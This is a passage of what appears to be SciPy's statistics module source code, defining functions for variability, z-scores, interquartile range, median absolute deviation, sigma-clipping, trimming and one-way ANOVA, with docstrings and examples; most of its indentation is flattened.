Calculate relative frequencies
>>> res = stats.relfreq(samples, numbins=25)
Calculate space of values for x
>>> x = res.lowerlimit + np.linspace(0, res.binsize*res.frequency.size,
... res.frequency.size)
Plot relative frequency histogram
>>> fig = plt.figure(figsize=(5, 4))
>>> ax = fig.add_subplot(1, 1, 1)
>>> ax.bar(x, res.frequency, width=res.binsize)
>>> ax.set_title('Relative frequency histogram')
>>> ax.set_xlim([x.min(), x.max()])
>>> plt.show()
"""
a = np.asanyarray(a)
h, l, b, e = _histogram(a, numbins, defaultreallimits, weights=weights)
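    # Convert the absolute bin counts into fractions of the total number of
    # observations.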
h = h / a.shape[0]
return RelfreqResult(h, l, b, e)
#####################################
# VARIABILITY FUNCTIONS #
#####################################
def obrientransform(*args):
"""
Compute the O'Brien transform on input data (any number of arrays).
Used to test for homogeneity of variance prior to running one-way stats.
Each array in ``*args`` is one level of a factor.
If `f_oneway` is run on the transformed data and found significant,
the variances are unequal. From Maxwell and Delaney [1]_, p.112.
Parameters
----------
args : tuple of array_like
Any number of arrays.
Returns
-------
obrientransform : ndarray
Transformed data for use in an ANOVA. The first dimension
of the result corresponds to the sequence of transformed
arrays. If the arrays given are all 1-D of the same length,
the return value is a 2-D array; otherwise it is a 1-D array
of type object, with each element being an ndarray.
References
----------
.. [1] S. E. Maxwell and H. D. Delaney, "Designing Experiments and
Analyzing Data: A Model Comparison Perspective", Wadsworth, 1990.
Examples
--------
We'll test the following data sets for differences in their variance.
>>> x = [10, 11, 13, 9, 7, 12, 12, 9, 10]
>>> y = [13, 21, 5, 10, 8, 14, 10, 12, 7, 15]
Apply the O'Brien transform to the data.
>>> from scipy.stats import obrientransform
>>> tx, ty = obrientransform(x, y)
Use `scipy.stats.f_oneway` to apply a one-way ANOVA test to the
transformed data.
>>> from scipy.stats import f_oneway
>>> F, p = f_oneway(tx, ty)
>>> p
0.1314139477040335
If we require that ``p < 0.05`` for significance, we cannot conclude
that the variances are different.
"""
TINY = np.sqrt(np.finfo(float).eps)
# `arrays` will hold the transformed arguments.
arrays = []
for arg in args:
a = np.asarray(arg)
n = len(a)
mu = np.mean(a)
sq = (a - mu)**2
sumsq = sq.sum()
# The O'Brien transform.
t = ((n - 1.5) * n * sq - 0.5 * sumsq) / ((n - 1) * (n - 2))
# Check that the mean of the transformed data is equal to the
# original variance.
var = sumsq / (n - 1)
if abs(var - np.mean(t)) > TINY:
raise ValueError('Lack of convergence in obrientransform.')
arrays.append(t)
return np.array(arrays)
def sem(a, axis=0, ddof=1, nan_policy='propagate'):
"""
Compute standard error of the mean.
Calculate the standard error of the mean (or standard error of
measurement) of the values in the input array.
Parameters
----------
a : array_like
An array containing the values for which the standard error is
returned.
axis : int or None, optional
Axis along which to operate. Default is 0. If None, compute over
the whole array `a`.
ddof : int, optional
Delta degrees-of-freedom. How many degrees of freedom to adjust
for bias in limited samples relative to the population estimate
of variance. Defaults to 1.
nan_policy : {'propagate', 'raise', 'omit'}, optional
Defines how to handle when input contains nan.
The following options are available (default is 'propagate'):
* 'propagate': returns nan
* 'raise': throws an error
* 'omit': performs the calculations ignoring nan values
Returns
-------
s : ndarray or float
The standard error of the mean in the sample(s), along the input axis.
Notes
-----
    The default value for `ddof` is different from the default (0) used by
    other ddof-containing routines, such as np.std and np.nanstd.
Examples
--------
Find standard error along the first axis:
>>> from scipy import stats
>>> a = np.arange(20).reshape(5,4)
>>> stats.sem(a)
array([ 2.8284, 2.8284, 2.8284, 2.8284])
Find standard error across the whole array, using n degrees of freedom:
>>> stats.sem(a, axis=None, ddof=0)
1.2893796958227628
"""
a, axis = _chk_asarray(a, axis)
contains_nan, nan_policy = _contains_nan(a, nan_policy)
if contains_nan and nan_policy == 'omit':
a = ma.masked_invalid(a)
return mstats_basic.sem(a, axis, ddof)
n = a.shape[axis]
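    # Standard error of the mean: the sample standard deviation (with the
    # requested ddof) divided by sqrt(n).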
s = np.std(a, axis=axis, ddof=ddof) / np.sqrt(n)
return s
def zscore(a, axis=0, ddof=0, nan_policy='propagate'):
"""
Compute the z score.
Compute the z score of each value in the sample, relative to the
sample mean and standard deviation.
Parameters
----------
a : array_like
An array like object containing the sample data.
axis : int or None, optional
Axis along which to operate. Default is 0. If None, compute over
the whole array `a`.
ddof : int, optional
Degrees of freedom correction in the calculation of the
standard deviation. Default is 0.
nan_policy : {'propagate', 'raise', 'omit'}, optional
Defines how to handle when input contains nan. 'propagate' returns nan,
'raise' throws an error, 'omit' performs the calculations ignoring nan
values. Default is 'propagate'.
Returns
-------
zscore : array_like
The z-scores, standardized by mean and standard deviation of
input array `a`.
Notes
-----
This function preserves ndarray subclasses, and works also with
matrices and masked arrays (it uses `asanyarray` instead of
`asarray` for parameters).
Examples
--------
>>> a = np.array([ 0.7972, 0.0767, 0.4383, 0.7866, 0.8091,
... 0.1954, 0.6307, 0.6599, 0.1065, 0.0508])
>>> from scipy import stats
>>> stats.zscore(a)
array([ 1.1273, -1.247 , -0.0552, 1.0923, 1.1664, -0.8559, 0.5786,
0.6748, -1.1488, -1.3324])
Computing along a specified axis, using n-1 degrees of freedom
(``ddof=1``) to calculate the standard deviation:
>>> b = np.array([[ 0.3148, 0.0478, 0.6243, 0.4608],
... [ 0.7149, 0.0775, 0.6072, 0.9656],
... [ 0.6341, 0.1403, 0.9759, 0.4064],
... [ 0.5918, 0.6948, 0.904 , 0.3721],
... [ 0.0921, 0.2481, 0.1188, 0.1366]])
>>> stats.zscore(b, axis=1, ddof=1)
array([[-0.19264823, -1.28415119, 1.07259584, 0.40420358],
[ 0.33048416, -1.37380874, 0.04251374, 1.00081084],
[ 0.26796377, -1.12598418, 1.23283094, -0.37481053],
[-0.22095197, 0.24468594, 1.19042819, -1.21416216],
[-0.82780366, 1.4457416 , -0.43867764, -0.1792603 ]])
"""
a = np.asanyarray(a)
contains_nan, nan_policy = _contains_nan(a, nan_policy)
if contains_nan and nan_policy == 'omit':
mns = np.nanmean(a=a, axis=axis, keepdims=True)
sstd = np.nanstd(a=a, axis=axis, ddof=ddof, keepdims=True)
else:
mns = a.mean(axis=axis, keepdims=True)
sstd = a.std(axis=axis, ddof=ddof, keepdims=True)
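    # keepdims=True above lets the mean and standard deviation broadcast
    # against `a` along the reduced axis.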
return (a - mns) / sstd
def zmap(scores, compare, axis=0, ddof=0):
"""
Calculate the relative z-scores.
Return an array of z-scores, i.e., scores that are standardized to
zero mean and unit variance, where mean and variance are calculated
from the comparison array.
Parameters
----------
scores : array_like
The input for which z-scores are calculated.
compare : array_like
The input from which the mean and standard deviation of the
normalization are taken; assumed to have the same dimension as
`scores`.
axis : int or None, optional
Axis over which mean and variance of `compare` are calculated.
Default is 0. If None, compute over the whole array `scores`.
ddof : int, optional
Degrees of freedom correction in the calculation of the
standard deviation. Default is 0.
Returns
-------
zscore : array_like
Z-scores, in the same shape as `scores`.
Notes
-----
This function preserves ndarray subclasses, and works also with
matrices and masked arrays (it uses `asanyarray` instead of
`asarray` for parameters).
Examples
--------
>>> from scipy.stats import zmap
>>> a = [0.5, 2.0, 2.5, 3]
>>> b = [0, 1, 2, 3, 4]
>>> zmap(a, b)
array([-1.06066017, 0. , 0.35355339, 0.70710678])
"""
scores, compare = map(np.asanyarray, [scores, compare])
mns = compare.mean(axis=axis, keepdims=True)
sstd = compare.std(axis=axis, ddof=ddof, keepdims=True)
return (scores - mns) / sstd
def gstd(a, axis=0, ddof=1):
"""
Calculate the geometric standard deviation of an array.
The geometric standard deviation describes the spread of a set of numbers
where the geometric mean is preferred. It is a multiplicative factor, and
so a dimensionless quantity.
It is defined as the exponent of the standard deviation of ``log(a)``.
Mathematically the population geometric standard deviation can be
evaluated as::
gstd = exp(std(log(a)))
.. versionadded:: 1.3.0
Parameters
----------
a : array_like
An array like object containing the sample data.
axis : int, tuple or None, optional
Axis along which to operate. Default is 0. If None, compute over
the whole array `a`.
ddof : int, optional
Degree of freedom correction in the calculation of the
geometric standard deviation. Default is 1.
Returns
-------
ndarray or float
An array of the geometric standard deviation. If `axis` is None or `a`
is a 1d array a float is returned.
Notes
-----
As the calculation requires the use of logarithms the geometric standard
deviation only supports strictly positive values. Any non-positive or
infinite values will raise a `ValueError`.
The geometric standard deviation is sometimes confused with the exponent of
the standard deviation, ``exp(std(a))``. Instead the geometric standard
deviation is ``exp(std(log(a)))``.
    The default value for `ddof` is different from the default value (0) used
    by other ddof-containing functions, such as ``np.std`` and ``np.nanstd``.
Examples
--------
Find the geometric standard deviation of a log-normally distributed sample.
Note that the standard deviation of the distribution is one, on a
log scale this evaluates to approximately ``exp(1)``.
>>> from scipy.stats import gstd
>>> np.random.seed(123)
>>> sample = np.random.lognormal(mean=0, sigma=1, size=1000)
>>> gstd(sample)
2.7217860664589946
Compute the geometric standard deviation of a multidimensional array and
of a given axis.
>>> a = np.arange(1, 25).reshape(2, 3, 4)
>>> gstd(a, axis=None)
2.2944076136018947
>>> gstd(a, axis=2)
array([[1.82424757, 1.22436866, 1.13183117],
[1.09348306, 1.07244798, 1.05914985]])
>>> gstd(a, axis=(1,2))
array([2.12939215, 1.22120169])
The geometric standard deviation further handles masked arrays.
>>> a = np.arange(1, 25).reshape(2, 3, 4)
>>> ma = np.ma.masked_where(a > 16, a)
>>> ma
masked_array(
data=[[[1, 2, 3, 4],
[5, 6, 7, 8],
[9, 10, 11, 12]],
[[13, 14, 15, 16],
[--, --, --, --],
[--, --, --, --]]],
mask=[[[False, False, False, False],
[False, False, False, False],
[False, False, False, False]],
[[False, False, False, False],
[ True, True, True, True],
[ True, True, True, True]]],
fill_value=999999)
>>> gstd(ma, axis=2)
masked_array(
data=[[1.8242475707663655, 1.2243686572447428, 1.1318311657788478],
[1.0934830582350938, --, --]],
mask=[[False, False, False],
[False, True, True]],
fill_value=999999)
"""
a = np.asanyarray(a)
log = ma.log if isinstance(a, ma.MaskedArray) else np.log
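    # Use the masked-array log for masked input so that the mask is
    # propagated through the calculation.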
try:
with warnings.catch_warnings():
warnings.simplefilter("error", RuntimeWarning)
return np.exp(np.std(log(a), axis=axis, ddof=ddof))
except RuntimeWarning as w:
if np.isinf(a).any():
raise ValueError(
'Infinite value encountered. The geometric standard deviation '
'is defined for strictly positive values only.')
a_nan = np.isnan(a)
a_nan_any = a_nan.any()
# exclude NaN's from negativity check, but
# avoid expensive masking for arrays with no NaN
if ((a_nan_any and np.less_equal(np.nanmin(a), 0)) or
(not a_nan_any and np.less_equal(a, 0).any())):
raise ValueError(
'Non positive value encountered. The geometric standard '
'deviation is defined for strictly positive values only.')
elif 'Degrees of freedom <= 0 for slice' == str(w):
raise ValueError(w)
else:
# Remaining warnings don't need to be exceptions.
return np.exp(np.std(log(a, where=~a_nan), axis=axis, ddof=ddof))
except TypeError:
raise ValueError(
'Invalid array input. The inputs could not be '
'safely coerced to any supported types')
# Private dictionary initialized only once at module level
# See https://en.wikipedia.org/wiki/Robust_measures_of_scale
_scale_conversions = {'raw': 1.0,
'normal': special.erfinv(0.5) * 2.0 * math.sqrt(2.0)}
def iqr(x, axis=None, rng=(25, 75), scale='raw', nan_policy='propagate',
interpolation='linear', keepdims=False):
r"""
Compute the interquartile range of the data along the specified axis.
The interquartile range (IQR) is the difference between the 75th and
25th percentile of the data. It is a measure of the dispersion
similar to standard deviation or variance, but is much more robust
against outliers [2]_.
The ``rng`` parameter allows this function to compute other
percentile ranges than the actual IQR. For example, setting
``rng=(0, 100)`` is equivalent to `numpy.ptp`.
The IQR of an empty array is `np.nan`.
.. versionadded:: 0.18.0
Parameters
----------
x : array_like
Input array or object that can be converted to an array.
axis : int or sequence of int, optional
Axis along which the range is computed. The default is to
compute the IQR for the entire array.
    rng : Two-element sequence containing floats in range of [0,100], optional
Percentiles over which to compute the range. Each must be
between 0 and 100, inclusive. The default is the true IQR:
`(25, 75)`. The order of the elements is not important.
scale : scalar or str, optional
The numerical value of scale will be divided out of the final
result. The following string values are recognized:
'raw' : No scaling, just return the raw IQR.
'normal' : Scale by :math:`2 \sqrt{2} erf^{-1}(\frac{1}{2}) \approx 1.349`.
The default is 'raw'. Array-like scale is also allowed, as long
as it broadcasts correctly to the output such that
``out / scale`` is a valid operation. The output dimensions
depend on the input array, `x`, the `axis` argument, and the
`keepdims` flag.
nan_policy : {'propagate', 'raise', 'omit'}, optional
Defines how to handle when input contains nan.
The following options are available (default is 'propagate'):
* 'propagate': returns nan
* 'raise': throws an error
* 'omit': performs the calculations ignoring nan values
interpolation : {'linear', 'lower', 'higher', 'midpoint', 'nearest'}, optional
Specifies the interpolation method to use when the percentile
boundaries lie between two data points `i` and `j`.
The following options are available (default is 'linear'):
* 'linear': `i + (j - i) * fraction`, where `fraction` is the
fractional part of the index surrounded by `i` and `j`.
* 'lower': `i`.
* 'higher': `j`.
* 'nearest': `i` or `j` whichever is nearest.
* 'midpoint': `(i + j) / 2`.
keepdims : bool, optional
If this is set to `True`, the reduced axes are left in the
result as dimensions with size one. With this option, the result
will broadcast correctly against the original array `x`.
Returns
-------
iqr : scalar or ndarray
If ``axis=None``, a scalar is returned. If the input contains
integers or floats of smaller precision than ``np.float64``, then the
output data-type is ``np.float64``. Otherwise, the output data-type is
the same as that of the input.
See Also
--------
numpy.std, numpy.var
Notes
-----
This function is heavily dependent on the version of `numpy` that is
installed. Versions greater than 1.11.0b3 are highly recommended, as they
include a number of enhancements and fixes to `numpy.percentile` and
`numpy.nanpercentile` that affect the operation of this function. The
following modifications apply:
Below 1.10.0 : `nan_policy` is poorly defined.
The default behavior of `numpy.percentile` is used for 'propagate'. This
is a hybrid of 'omit' and 'propagate' that mostly yields a skewed
version of 'omit' since NaNs are sorted to the end of the data. A
warning is raised if there are NaNs in the data.
Below 1.9.0: `numpy.nanpercentile` does not exist.
This means that `numpy.percentile` is used regardless of `nan_policy`
and a warning is issued. See previous item for a description of the
behavior.
Below 1.9.0: `keepdims` and `interpolation` are not supported.
The keywords get ignored with a warning if supplied with non-default
values. However, multiple axes are still supported.
References
----------
.. [1] "Interquartile range" https://en.wikipedia.org/wiki/Interquartile_range
.. [2] "Robust measures of scale" https://en.wikipedia.org/wiki/Robust_measures_of_scale
.. [3] "Quantile" https://en.wikipedia.org/wiki/Quantile
Examples
--------
>>> from scipy.stats import iqr
>>> x = np.array([[10, 7, 4], [3, 2, 1]])
>>> x
array([[10, 7, 4],
[ 3, 2, 1]])
>>> iqr(x)
4.0
>>> iqr(x, axis=0)
array([ 3.5, 2.5, 1.5])
>>> iqr(x, axis=1)
array([ 3., 1.])
>>> iqr(x, axis=1, keepdims=True)
array([[ 3.],
[ 1.]])
"""
x = asarray(x)
# This check prevents percentile from raising an error later. Also, it is
# consistent with `np.var` and `np.std`.
if not x.size:
return np.nan
# An error may be raised here, so fail-fast, before doing lengthy
# computations, even though `scale` is not used until later
if isinstance(scale, string_types):
scale_key = scale.lower()
if scale_key not in _scale_conversions:
raise ValueError("{0} not a valid scale for `iqr`".format(scale))
scale = _scale_conversions[scale_key]
# Select the percentile function to use based on nans and policy
contains_nan, nan_policy = _contains_nan(x, nan_policy)
if contains_nan and nan_policy == 'omit':
percentile_func = _iqr_nanpercentile
else:
percentile_func = _iqr_percentile
if len(rng) != 2:
raise TypeError("quantile range must be two element sequence")
if np.isnan(rng).any():
raise ValueError("range must not contain NaNs")
rng = sorted(rng)
pct = percentile_func(x, rng, axis=axis, interpolation=interpolation,
keepdims=keepdims, contains_nan=contains_nan)
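    # The (optionally scaled) IQR is the difference between the upper and
    # lower percentiles.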
out = np.subtract(pct[1], pct[0])
if scale != 1.0:
out /= scale
return out
def median_absolute_deviation(x, axis=0, center=np.median, scale=1.4826,
nan_policy='propagate'):
"""
Compute the median absolute deviation of the data along the given axis.
The median absolute deviation (MAD, [1]_) computes the median over the
absolute deviations from the median. It is a measure of dispersion
similar to the standard deviation but more robust to outliers [2]_.
The MAD of an empty array is ``np.nan``.
.. versionadded:: 1.3.0
Parameters
----------
x : array_like
Input array or object that can be converted to an array.
axis : int or None, optional
Axis along which the range is computed. Default is 0. If None, compute
the MAD over the entire array.
center : callable, optional
A function that will return the central value. The default is to use
        np.median. Any user-defined function used must have the function
        signature ``func(arr, axis)``.
    scale : float, optional
The scaling factor applied to the MAD. The default scale (1.4826)
ensures consistency with the standard deviation for normally distributed
data.
nan_policy : {'propagate', 'raise', 'omit'}, optional
Defines how to handle when input contains nan.
The following options are available (default is 'propagate'):
* 'propagate': returns nan
* 'raise': throws an error
* 'omit': performs the calculations ignoring nan values
Returns
-------
mad : scalar or ndarray
If ``axis=None``, a scalar is returned. If the input contains
integers or floats of smaller precision than ``np.float64``, then the
output data-type is ``np.float64``. Otherwise, the output data-type is
the same as that of the input.
See Also
--------
numpy.std, numpy.var, numpy.median, scipy.stats.iqr, scipy.stats.tmean,
scipy.stats.tstd, scipy.stats.tvar
Notes
-----
The `center` argument only affects the calculation of the central value
around which the MAD is calculated. That is, passing in ``center=np.mean``
will calculate the MAD around the mean - it will not calculate the *mean*
absolute deviation.
References
----------
.. [1] "Median absolute deviation" https://en.wikipedia.org/wiki/Median_absolute_deviation
.. [2] "Robust measures of scale" https://en.wikipedia.org/wiki/Robust_measures_of_scale
Examples
--------
When comparing the behavior of `median_absolute_deviation` with ``np.std``,
    the latter is strongly affected when a single value of the array is
    changed to an outlier, while the MAD hardly changes:
>>> from scipy import stats
>>> x = stats.norm.rvs(size=100, scale=1, random_state=123456)
>>> x.std()
0.9973906394005013
>>> stats.median_absolute_deviation(x)
1.2280762773108278
>>> x[0] = 345.6
>>> x.std()
34.42304872314415
>>> stats.median_absolute_deviation(x)
1.2340335571164334
Axis handling example:
>>> x = np.array([[10, 7, 4], [3, 2, 1]])
>>> x
array([[10, 7, 4],
[ 3, 2, 1]])
>>> stats.median_absolute_deviation(x)
array([5.1891, 3.7065, 2.2239])
>>> stats.median_absolute_deviation(x, axis=None)
2.9652
"""
x = asarray(x)
# Consistent with `np.var` and `np.std`.
if not x.size:
return np.nan
contains_nan, nan_policy = _contains_nan(x, nan_policy)
if contains_nan and nan_policy == 'propagate':
return np.nan
if contains_nan and nan_policy == 'omit':
# Way faster than carrying the masks around
arr = ma.masked_invalid(x).compressed()
else:
arr = x
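    # MAD = scale * median(|x - center(x)|), computed over the flattened
    # data when axis is None and along `axis` otherwise.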
if axis is None:
med = center(arr)
mad = np.median(np.abs(arr - med))
else:
med = np.apply_over_axes(center, arr, axis)
mad = np.median(np.abs(arr - med), axis=axis)
return scale * mad
def _iqr_percentile(x, q, axis=None, interpolation='linear', keepdims=False, contains_nan=False):
"""
Private wrapper that works around older versions of `numpy`.
While this function is pretty much necessary for the moment, it
should be removed as soon as the minimum supported numpy version
allows.
"""
if contains_nan and NumpyVersion(np.__version__) < '1.10.0a':
# I see no way to avoid the version check to ensure that the corrected
# NaN behavior has been implemented except to call `percentile` on a
# small array.
msg = "Keyword nan_policy='propagate' not correctly supported for " \
"numpy versions < 1.10.x. The default behavior of " \
"`numpy.percentile` will be used."
warnings.warn(msg, RuntimeWarning)
try:
# For older versions of numpy, there are two things that can cause a
# problem here: missing keywords and non-scalar axis. The former can be
# partially handled with a warning, the latter can be handled fully by
# hacking in an implementation similar to numpy's function for
# providing multi-axis functionality
# (`numpy.lib.function_base._ureduce` for the curious).
result = np.percentile(x, q, axis=axis, keepdims=keepdims,
interpolation=interpolation)
except TypeError:
if interpolation != 'linear' or keepdims:
            # At time of writing, this means np.__version__ < 1.9.0
warnings.warn("Keywords interpolation and keepdims not supported "
"for your version of numpy", RuntimeWarning)
try:
# Special processing if axis is an iterable
original_size = len(axis)
except TypeError:
# Axis is a scalar at this point
pass
else:
axis = np.unique(np.asarray(axis) % x.ndim)
if original_size > axis.size:
# mimic numpy if axes are duplicated
raise ValueError("duplicate value in axis")
if axis.size == x.ndim:
# axis includes all axes: revert to None
axis = None
elif axis.size == 1:
# no rolling necessary
axis = axis[0]
else:
# roll multiple axes to the end and flatten that part out
for ax in axis[::-1]:
x = np.rollaxis(x, ax, x.ndim)
x = x.reshape(x.shape[:-axis.size] +
(np.prod(x.shape[-axis.size:]),))
axis = -1
result = np.percentile(x, q, axis=axis)
return result
def _iqr_nanpercentile(x, q, axis=None, interpolation='linear', keepdims=False,
contains_nan=False):
"""
Private wrapper that works around the following:
1. A bug in `np.nanpercentile` that was around until numpy version
1.11.0.
2. A bug in `np.percentile` NaN handling that was fixed in numpy
version 1.10.0.
3. The non-existence of `np.nanpercentile` before numpy version
1.9.0.
While this function is pretty much necessary for the moment, it
should be removed as soon as the minimum supported numpy version
allows.
"""
if hasattr(np, 'nanpercentile'):
        # np.nanpercentile exists, i.e. np.__version__ >= 1.9.0
result = np.nanpercentile(x, q, axis=axis,
interpolation=interpolation,
keepdims=keepdims)
        # If the result is non-scalar and this version's nanpercentile does
        # not do a proper axis roll, fix it up below.
# I see no way of avoiding the version test since dimensions may just
# happen to match in the data.
if result.ndim > 1 and NumpyVersion(np.__version__) < '1.11.0a':
axis = np.asarray(axis)
if axis.size == 1:
# If only one axis specified, reduction happens along that dimension
if axis.ndim == 0:
axis = axis[None]
result = np.rollaxis(result, axis[0])
else:
                # If multiple axes, the reduced dimension is last
result = np.rollaxis(result, -1)
else:
msg = "Keyword nan_policy='omit' not correctly supported for numpy " \
"versions < 1.9.x. The default behavior of numpy.percentile " \
"will be used."
warnings.warn(msg, RuntimeWarning)
result = _iqr_percentile(x, q, axis=axis)
return result
#####################################
# TRIMMING FUNCTIONS #
#####################################
SigmaclipResult = namedtuple('SigmaclipResult', ('clipped', 'lower', 'upper'))
def sigmaclip(a, low=4., high=4.):
"""
Perform iterative sigma-clipping of array elements.
Starting from the full sample, all elements outside the critical range are
removed, i.e. all elements of the input array `c` that satisfy either of
the following conditions::
c < mean(c) - std(c)*low
c > mean(c) + std(c)*high
The iteration continues with the updated sample until no
elements are outside the (updated) range.
Parameters
----------
a : array_like
Data array, will be raveled if not 1-D.
low : float, optional
Lower bound factor of sigma clipping. Default is 4.
high : float, optional
Upper bound factor of sigma clipping. Default is 4.
Returns
-------
clipped : ndarray
Input array with clipped elements removed.
lower : float
        Lower threshold value used for clipping.
    upper : float
        Upper threshold value used for clipping.
Examples
--------
>>> from scipy.stats import sigmaclip
>>> a = np.concatenate((np.linspace(9.5, 10.5, 31),
... np.linspace(0, 20, 5)))
>>> fact = 1.5
>>> c, low, upp = sigmaclip(a, fact, fact)
>>> c
array([ 9.96666667, 10. , 10.03333333, 10. ])
>>> c.var(), c.std()
(0.00055555555555555165, 0.023570226039551501)
>>> low, c.mean() - fact*c.std(), c.min()
(9.9646446609406727, 9.9646446609406727, 9.9666666666666668)
>>> upp, c.mean() + fact*c.std(), c.max()
(10.035355339059327, 10.035355339059327, 10.033333333333333)
>>> a = np.concatenate((np.linspace(9.5, 10.5, 11),
... np.linspace(-100, -50, 3)))
>>> c, low, upp = sigmaclip(a, 1.8, 1.8)
>>> (c == np.linspace(9.5, 10.5, 11)).all()
True
"""
c = np.asarray(a).ravel()
delta = 1
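    # Iterate: recompute the mean and standard deviation of the surviving
    # sample and drop points outside [mean - std*low, mean + std*high]
    # until no further points are removed (delta == 0).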
while delta:
c_std = c.std()
c_mean = c.mean()
size = c.size
critlower = c_mean - c_std * low
critupper = c_mean + c_std * high
c = c[(c >= critlower) & (c <= critupper)]
delta = size - c.size
return SigmaclipResult(c, critlower, critupper)
def trimboth(a, proportiontocut, axis=0):
"""
Slice off a proportion of items from both ends of an array.
Slice off the passed proportion of items from both ends of the passed
array (i.e., with `proportiontocut` = 0.1, slices leftmost 10% **and**
rightmost 10% of scores). The trimmed values are the lowest and
highest ones.
Slice off less if proportion results in a non-integer slice index (i.e.
conservatively slices off `proportiontocut`).
Parameters
----------
a : array_like
Data to trim.
proportiontocut : float
Proportion (in range 0-1) of total data set to trim of each end.
axis : int or None, optional
Axis along which to trim data. Default is 0. If None, compute over
the whole array `a`.
Returns
-------
out : ndarray
Trimmed version of array `a`. The order of the trimmed content
is undefined.
See Also
--------
trim_mean
Examples
--------
>>> from scipy import stats
>>> a = np.arange(20)
>>> b = stats.trimboth(a, 0.1)
>>> b.shape
(16,)
"""
a = np.asarray(a)
if a.size == 0:
return a
if axis is None:
a = a.ravel()
axis = 0
nobs = a.shape[axis]
lowercut = int(proportiontocut * nobs)
uppercut = nobs - lowercut
if (lowercut >= uppercut):
raise ValueError("Proportion too big.")
atmp = np.partition(a, (lowercut, uppercut - 1), axis)
sl = [slice(None)] * atmp.ndim
sl[axis] = slice(lowercut, uppercut)
return atmp[tuple(sl)]
def trim1(a, proportiontocut, tail='right', axis=0):
"""
Slice off a proportion from ONE end of the passed array distribution.
If `proportiontocut` = 0.1, slices off 'leftmost' or 'rightmost'
10% of scores. The lowest or highest values are trimmed (depending on
the tail).
Slice off less if proportion results in a non-integer slice index
(i.e. conservatively slices off `proportiontocut` ).
Parameters
----------
a : array_like
Input array.
proportiontocut : float
Fraction to cut off of 'left' or 'right' of distribution.
tail : {'left', 'right'}, optional
Defaults to 'right'.
axis : int or None, optional
Axis along which to trim data. Default is 0. If None, compute over
the whole array `a`.
Returns
-------
trim1 : ndarray
Trimmed version of array `a`. The order of the trimmed content is
undefined.
"""
a = np.asarray(a)
if axis is None:
a = a.ravel()
axis = 0
nobs = a.shape[axis]
# avoid possible corner case
if proportiontocut >= 1:
return []
if tail.lower() == 'right':
lowercut = 0
uppercut = nobs - int(proportiontocut * nobs)
elif tail.lower() == 'left':
lowercut = int(proportiontocut * nobs)
uppercut = nobs
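    # As in `trimboth`, partition so that the values to keep lie between
    # `lowercut` and `uppercut`, then slice them out.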
atmp = np.partition(a, (lowercut, uppercut - 1), axis)
return atmp[lowercut:uppercut]
def trim_mean(a, proportiontocut, axis=0):
"""
Return mean of array after trimming distribution from both tails.
If `proportiontocut` = 0.1, slices off 'leftmost' and 'rightmost' 10% of
scores. The input is sorted before slicing. Slices off less if proportion
results in a non-integer slice index (i.e., conservatively slices off
`proportiontocut` ).
Parameters
----------
a : array_like
Input array.
proportiontocut : float
Fraction to cut off of both tails of the distribution.
axis : int or None, optional
Axis along which the trimmed means are computed. Default is 0.
If None, compute over the whole array `a`.
Returns
-------
trim_mean : ndarray
Mean of trimmed array.
See Also
--------
trimboth
tmean : Compute the trimmed mean ignoring values outside given `limits`.
Examples
--------
>>> from scipy import stats
>>> x = np.arange(20)
>>> stats.trim_mean(x, 0.1)
9.5
>>> x2 = x.reshape(5, 4)
>>> x2
array([[ 0, 1, 2, 3],
[ 4, 5, 6, 7],
[ 8, 9, 10, 11],
[12, 13, 14, 15],
[16, 17, 18, 19]])
>>> stats.trim_mean(x2, 0.25)
array([ 8., 9., 10., 11.])
>>> stats.trim_mean(x2, 0.25, axis=1)
array([ 1.5, 5.5, 9.5, 13.5, 17.5])
"""
a = np.asarray(a)
if a.size == 0:
return np.nan
if axis is None:
a = a.ravel()
axis = 0
nobs = a.shape[axis]
lowercut = int(proportiontocut * nobs)
uppercut = nobs - lowercut
if (lowercut > uppercut):
raise ValueError("Proportion too big.")
atmp = np.partition(a, (lowercut, uppercut - 1), axis)
sl = [slice(None)] * atmp.ndim
sl[axis] = slice(lowercut, uppercut)
return np.mean(atmp[tuple(sl)], axis=axis)
F_onewayResult = namedtuple('F_onewayResult', ('statistic', 'pvalue'))
def f_oneway(*args):
"""
Perform one-way ANOVA.
The one-way ANOVA tests the null hypothesis that two or more groups have
the same population mean. The test is applied to samples from two or
more groups, possibly with differing sizes.
Parameters
----------
sample1, sample2, ... : array_like
The sample measurements for each group.
Returns
-------
statistic : float
The computed F-value of the test.
pvalue : float
The associated p-value from the F-distribution.
Notes
-----
The ANOVA test has important assumptions that must be satisfied in order
for the associated p-value to be valid.
1. The samples are independent.
2. Each sample is from a normally distributed population.
3. The population standard deviations of the groups are all equal. This
property is known as homoscedasticity.
If these assumptions are not true for a given set of data, it may still be
possible to use the Kruskal-Wallis H-test (`scipy.stats.kruskal`) although
with some loss of power.
The algorithm is from Heiman[2], pp.394-7.
References
----------
.. [1] R. Lowry, "Concepts and Applications of Inferential Statistics",
Chapter 14, 2014, http://vassarstats.net/textbook/
.. [2] G.W. Heiman, "Understanding research methods and statistics: An
integrated introduction for psychology", Houghton, Mifflin and
Company, 2001.
.. [3] G.H. McDonald, "Handbook of Biological Statistics", One-way ANOVA.
http://www.biostathandbook.com/onewayanova.html
Examples
--------
>>> import scipy.stats as stats
[3]_ Here are some data on a shell measurement (the length of the anterior
adductor muscle scar, standardized by dividing by length) in the mussel
Mytilus trossulus from five locations: Tillamook, Oregon; Newport, Oregon;
Petersburg, Alaska; Magadan, Russia; and Tvarminne, Finland, taken from a
much larger data set used in McDonald et al. (1991).
>>> tillamook = [0.0571, 0.0813, 0.0831, 0.0976, 0.0817, 0.0859, 0.0735,
... 0.0659, 0.0923, 0.0836]
>>> newport = [0.0873, 0.0662, 0.0672, 0.0819, 0.0749, 0.0649, 0.0835,
... 0.0725]
>>> petersburg = [0.0974, 0.1352, 0.0817, 0.1016, 0.0968, 0.1064, 0.105]
>>> magadan = [0.1033, 0.0915, 0.0781, 0.0685, 0.0677, 0.0697, 0.0764,
... 0.0689]
>>> tvarminne = [0.0703, 0.1026, 0.0956, 0.0973, 0.1039, 0.1045]
>>> stats.f_oneway(tillamook, newport, petersburg, magadan, tvarminne)
(7.1210194716424473, 0.00028122423145345439)
"""
args = [np.asarray(arg, dtype=float) for arg in args]
# ANOVA on N groups, each in its own array
num_groups = len(args)
alldata = np.concatenate(args)
bign = len(alldata)
# Determine the mean of the data, and subtract that from all inputs to a
    # variance (via sum_of_sq / sq_of_sum) calculation. Variance is invariant
    # to a shift in location, and centering all data around zero vastly
# improves numerical stability.
offset = alldata.mean()
alldata -= offset
sstot = _sum_of_squares(alldata) - (_square_of_sums(alldata) / bign)
ssbn = 0
for a in args:
